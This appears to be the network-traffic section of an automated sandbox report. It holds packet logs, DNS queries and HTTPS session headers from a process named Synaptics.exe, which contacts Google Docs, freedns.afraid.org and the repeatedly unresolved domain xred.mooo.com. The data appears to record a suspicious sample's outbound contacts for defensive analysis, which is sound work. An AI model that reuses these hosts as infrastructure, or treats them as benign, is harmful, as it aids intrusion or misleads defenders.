                                                                                                                                                                                                                          May 27, 2022 04:38:21.424278975 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.424340963 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.424438953 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.425211906 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.425240993 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.475684881 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.475784063 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.477848053 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.477874994 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.483134031 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.483166933 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563452959 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563577890 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563592911 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563620090 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563654900 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563714027 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563729048 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.563781023 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.564311981 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.564398050 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.564450979 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.564589977 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.564637899 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.564738989 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.565663099 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.565685987 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.566971064 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.567009926 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.567089081 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.567559958 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.567575932 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.619352102 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.619496107 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.652384996 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.652405977 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.657849073 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.657871962 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689368010 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689434052 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689502001 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689522982 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689533949 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689582109 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689776897 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689836025 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689846992 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.689891100 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.691046000 CEST49754443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.691067934 CEST44349754172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.755772114 CEST49759443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.755822897 CEST44349759172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.755904913 CEST49759443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.759020090 CEST49759443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.759054899 CEST44349759172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.809552908 CEST44349759172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.809639931 CEST49759443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.858571053 CEST49759443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.858599901 CEST44349759172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.864149094 CEST49759443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.864175081 CEST44349759172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.870906115 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.870985985 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.871012926 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.871078968 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.871084929 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.871104956 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.871143103 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.871161938 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874128103 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874198914 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874218941 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874243021 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874281883 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874344110 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874409914 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874435902 CEST44349756172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874460936 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.874500036 CEST49756443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.875778913 CEST49760443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.875827074 CEST44349760172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.875912905 CEST49760443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.876508951 CEST49760443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.876549006 CEST44349760172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.826258898 CEST49764443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.826297998 CEST49764443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.827075958 CEST44349764172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.827136993 CEST44349764172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.827138901 CEST49764443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.827181101 CEST49764443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.856827974 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.857058048 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.883061886 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.883076906 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.889981985 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.890000105 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.892307997 CEST49764443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.892333984 CEST44349764172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.893959045 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.894001961 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.894082069 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.894722939 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.894740105 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.946275949 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.946423054 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.958888054 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.958904028 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:22.963848114 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:22.963864088 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093761921 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093832970 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093853951 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093867064 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093904018 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093929052 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093934059 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.093975067 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.095933914 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.096005917 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.096015930 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.096031904 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.096065044 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.096092939 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.101409912 CEST49765443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.101430893 CEST44349765172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.114793062 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.114871025 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.114985943 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.115614891 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.115641117 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.164073944 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.164243937 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.185183048 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.185220957 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.189421892 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.189456940 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.286869049 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.286972046 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.286995888 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287065983 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287094116 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287103891 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287117958 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287157059 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287380934 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287441015 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287446976 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.287502050 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.291277885 CEST49766443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.291311979 CEST44349766172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.292561054 CEST49768443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.292609930 CEST44349768172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.292702913 CEST49768443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.293265104 CEST49768443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.293278933 CEST44349768172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.343272924 CEST44349768172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.343404055 CEST49768443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.392214060 CEST49768443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.392230988 CEST44349768172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395205975 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395334005 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395354986 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395406008 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395431042 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395579100 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395593882 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.395657063 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396260977 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396325111 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396337986 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396387100 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396392107 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396441936 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396909952 CEST49768443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.396927118 CEST44349768172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.403314114 CEST49767443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.403386116 CEST44349767172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.404499054 CEST49769443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.404560089 CEST44349769172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:23.404629946 CEST49769443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.405201912 CEST49769443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:23.405230999 CEST44349769172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.285701990 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.286181927 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.286196947 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.337022066 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.337115049 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.373301029 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.373322964 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.383394003 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.383409977 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.433391094 CEST44349776172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.433446884 CEST44349776172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.433501005 CEST49776443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.433532000 CEST44349776172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.433548927 CEST49776443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.433608055 CEST49776443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.438052893 CEST44349776172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.438199043 CEST49776443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.438216925 CEST44349776172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.438293934 CEST49776443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.532757998 CEST49776443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.532782078 CEST44349776172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.534729004 CEST49778443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.534760952 CEST44349778172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.535156965 CEST49778443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.536056042 CEST49778443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.536072016 CEST44349778172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580312014 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580543041 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580565929 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580641031 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580641031 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580665112 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580693960 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.580739021 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.584381104 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.584467888 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.584491014 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.584534883 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:24.585745096 CEST44349778172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.585959911 CEST49778443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:30.791366100 CEST804973969.42.215.252192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:30.791500092 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                                                          May 27, 2022 04:38:45.604988098 CEST804973969.42.215.252192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:45.605108976 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                                                          May 27, 2022 04:38:48.801315069 CEST49778443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:48.801353931 CEST44349778172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:48.805114031 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:48.805186987 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:51.627587080 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                                                          May 27, 2022 04:38:51.628154039 CEST49778443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          May 27, 2022 04:38:14.407345057 CEST5742153192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:14.432918072 CEST53574218.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:14.756045103 CEST6535853192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:14.775238991 CEST53653588.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:15.064286947 CEST4987353192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:15.081877947 CEST53498738.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.406763077 CEST6526653192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:20.426251888 CEST53652668.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.686239004 CEST6333253192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:21.703108072 CEST53633328.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.114582062 CEST5139153192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:24.133409977 CEST53513918.8.8.8192.168.2.3
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| May 27, 2022 04:38:14.407345057 CEST | 192.168.2.3 | 8.8.8.8 | 0xc6a6 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:14.756045103 CEST | 192.168.2.3 | 8.8.8.8 | 0x3c43 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:15.064286947 CEST | 192.168.2.3 | 8.8.8.8 | 0x7d91 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:20.406763077 CEST | 192.168.2.3 | 8.8.8.8 | 0x1c79 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:21.686239004 CEST | 192.168.2.3 | 8.8.8.8 | 0x317c | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:24.114582062 CEST | 192.168.2.3 | 8.8.8.8 | 0xae03 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| May 27, 2022 04:38:14.432918072 CEST | 8.8.8.8 | 192.168.2.3 | 0xc6a6 | No error (0) | docs.google.com | | 172.217.168.14 | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:14.775238991 CEST | 8.8.8.8 | 192.168.2.3 | 0x3c43 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:15.081877947 CEST | 8.8.8.8 | 192.168.2.3 | 0x7d91 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:20.426251888 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c79 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:21.703108072 CEST | 8.8.8.8 | 192.168.2.3 | 0x317c | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) |
| May 27, 2022 04:38:24.133409977 CEST | 8.8.8.8 | 192.168.2.3 | 0xae03 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) |
                                                                                                                                                                                                                          • docs.google.com
                                                                                                                                                                                                                          • freedns.afraid.org
                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          0192.168.2.349736172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          1192.168.2.349737172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          10192.168.2.349751172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          11192.168.2.349752172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          12192.168.2.349753172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          13192.168.2.349754172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
